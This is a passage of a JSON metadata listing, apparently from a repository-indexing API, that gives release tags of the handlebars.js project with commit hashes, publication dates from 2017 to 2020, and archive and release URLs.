gs/v3.0.8/manifests"},{"name":"v4.7.3","sha":"c9789691af60b446f12f75dd9762f9d8fd3f36eb","kind":"tag","published_at":"2020-02-05T05:10:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.3/manifests"},{"name":"v4.7.2","sha":"586e672c8bba7db787bc9bfe9a9fde4ec98d5b4f","kind":"tag","published_at":"2020-01-13T20:53:16.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.2/manifests"},{"name":"v4.7.1","sha":"14ba3d0c43d75bcfcdbfb7c95c9fac99d88a17c8","kind":"tag","published_at":"2020-01-12T12:21:10.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.1/manifests"},{"name":"v4.7.0","sha":"0d5c807017f8ba6c6d947f9d6852033c8faa2e49","kind":"tag","published_at":"2020-01-10T16:24:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"91a1b5d2f456cb733cbd88149fc9270973db79d7","kind":"tag","published_at":"2020-01-08T22:45:17.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.6.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.6.0/manifests"},{"name":"v4.5.3","sha":"c819c8b533934d2ac18001d7eb27a3205b00c2f3","kind":"tag","published_at":"2019-11-18T07:10:26.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.3/manifests"},{"name":"v4.5.2","sha":"8de121d21c88a6ab877e3a0eec9daaac483f3bf0","kind":"tag","published_at":"2019-11-13T21:07:27.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.2/manifests"},{"name":"v4.5.1","sha":"7ef86173abb446cf564ad6dc2646a4c361e2ab9f","kind":"tag","published_at":"2019-10-29T04:42:23.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.1/manifests"},{"name":"v4.5.0","sha":"b24797da01afd4e849fdb315dea8335792974522","kind":"tag","published_at":"2019-10-28T18:47:51.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.0/manifests"},{"name":"v4.4.5","sha":"8e1cce79186ab6caeb8c6ec9c1f8bcfa1a40e83d","kind":"tag","published_at":"2019-10-20T21:08:10.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.5/manifests"},{"name":"v4.4.4","sha":"2ab261eab7835e9c80ad1cb7ef9fc9b0f46d6a57","kind":"tag","published_at":"2019-10-20T19:33:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.4/manifests"},{"name":"v4.4.3","sha":"2e53fba68f8c51f9aca97615944fdbdeba94ff62","kind":"tag","published_at":"2019-10-08T20:05:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.3/manifests"},{"name":"v4.4.2","sha":"b793350fec0bb652c0bb2658089d7002af27a76b","kind":"tag","published_at":"2019-10-02T20:44:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.2/manifests"},{"name":"v4.2.2","sha":"0d5c691f36baae183349c51c47228da45278c50a","kind":"tag","published_at":"2019-10-02T20:12:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.2/manifests"},{"name":"v4.3.5","sha":"e96c1a5d86d8b2e8b152578fa37d5cdebc2964a3","kind":"tag","published_at":"2019-10-02T20:05:02.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.5/manifests"},{"name":"v4.4.1","sha":"b8e769fcb624664a6bc7114c8739c2438d46dbe9","kind":"tag","published_at":"2019-10-02T19:52:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"059b33057925ebda96536421cfc7c4c75e5c61e3","kind":"tag","published_at":"2019-09-29T13:29:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.0/manifests"},{"name":"v4.3.4","sha":"c958cc89550ca411a78fefa426b0acee80c702eb","kind":"tag","published_at":"2019-09-28T11:25:05.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.4/manifests"},{"name":"v4.3.3","sha":"e4738491b3e8db97aa9b4f9967f04093ceba1a1f","kind":"tag","published_at":"2019-09-27T05:46:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.3/manifests"},{"name":"v4.3.2","sha":"2357140c68d17cb4f8ab74431e8737de6b4b39b5","kind":"tag","published_at":"2019-09-26T21:58:48.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.2/manifests"},{"name":"v4.3.1","sha":"050cca0866b3496852d9b198141807c32e4dae81","kind":"tag","published_at":"2019-09-24T22:32:32.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.1/manifests"},{"name":"v4.3.0","sha":"a89081d440a9da9f3f25835f47de837907b0094a","kind":"tag","published_at":"2019-09-24T06:04:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"fff3e40402c9f9cd790984560658646a26e1c930","kind":"tag","published_at":"2019-09-20T17:40:48.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"164c7ceea4ce074f70f2fefeba81e2e551757ea6","kind":"tag","published_at":"2019-09-03T19:58:07.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.0/manifests"},{"name":"v4.1.2-0","sha":"f98c6a54256fec0b36ae1adc4c36ab5412ca3b88","kind":"tag","published_at":"2019-08-25T16:06:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.2-0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.2-0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.1.2-0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2-0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2-0/manifests"},{"name":"v3.0.7","sha":"55e4d9d80d5dd834fcf53c528e7e0aa080f315a5","kind":"tag","published_at":"2019-06-30T08:53:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.7/manifests"},{"name":"v4.0.14","sha":"272362e44c66d0110a4c98c7c1d121971ce447a7","kind":"tag","published_at":"2019-04-13T14:39:19.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.14","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.14/manifests"},{"name":"v4.1.2","sha":"10b5fcf92e6f3ddcbcec93c05c00cfdbb2e8d303","kind":"tag","published_at":"2019-04-13T14:19:22.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"f691db546e7563e1db3437d5a72f478f9e556714","kind":"tag","published_at":"2019-03-16T21:28:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.1/manifests"},{"name":"v4.0.13","sha":"9d4fff19d438a390b4e34d0a175b2de5f196cea8","kind":"tag","published_at":"2019-02-07T10:26:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13/manifests"},{"name":"v4.1.0","sha":"7caca944b1ae64b5bc11cba67d21e4b51ba6196a","kind":"tag","published_at":"2019-02-07T09:46:32.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.0/manifests"},{"name":"v4.0.13-beta.0","sha":"616f8c6fdb8b4224e5ab742e0ae400cfbc74086f","kind":"tag","published_at":"2019-02-02T20:26:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13-beta.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.13-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-beta.0/manifests"},{"name":"v4.0.13-0","sha":"0e56659f7bc9d5060bf791d58fd57c5f9a82ae17","kind":"tag","published_at":"2019-02-02T20:25:22.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13-0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13-0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.13-0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-0/manifests"},{"name":"v3.0.6","sha":"5a427d2d2b7264a83ca6702fddf63a6c7ba281c4","kind":"tag","published_at":"2019-01-02T09:17:56.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"64254b604b9d7fdf76d40b9c6675326eb4bda42b","kind":"tag","published_at":"2018-12-15T13:16:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"698c8a93a4066937977503d338bcd3b90d5035ca","kind":"tag","published_at":"2018-12-15T12:55:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.4/manifests"},{"name":"v4.0.12","sha":"8d22e6f501dc0720fe0610bb4dab60cae18e7d20","kind":"tag","published_at":"2018-09-04T18:44:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.12","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.12/manifests"},{"name":"v4.0.11","sha":"1e954ddf3c3ec6d2318e1fadc5e03aaf065b2fbd","kind":"tag","published_at":"2017-10-17T20:52:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.11","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.11/manifests"},{"name":"v4.0.10","sha":"670ec6fafbf99986a70074a37f73d41bad60b083","kind":"tag","published_at":"2017-05-21T12:11:27.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.10","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.10/manifests"},{"name":"v4.0.9","sha":"5ec78a8c70ac674f39a8408e04d59bd40340f6fe","kind":"tag","published_at":"2017-05-21T11:39:05.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.9","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.9/manifests"},{"name":"v4.0.8","sha":"fed5818876ec325b2b48a61395fe0089bdda05e8","kind":"commit","published_at":"2017-05-02T20:55:44.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.8/manifests"},{"name":"v4.0.7","sha":"606fa55b0a2fab4b22b810a21fc9ae1fd5fd8430","kind":"tag","published_at":"2017-04-29T20:52:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.7/manifests"},{"name":"tmp-1252-backup","sha":"ee913e28bd34dc6e97f98a99f00b484195f72d6f","kind":"commit","published_at":"2017-01-02T09:13:49.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/tmp-1252-backup","html_url":"https://github.com/handlebars-lang/han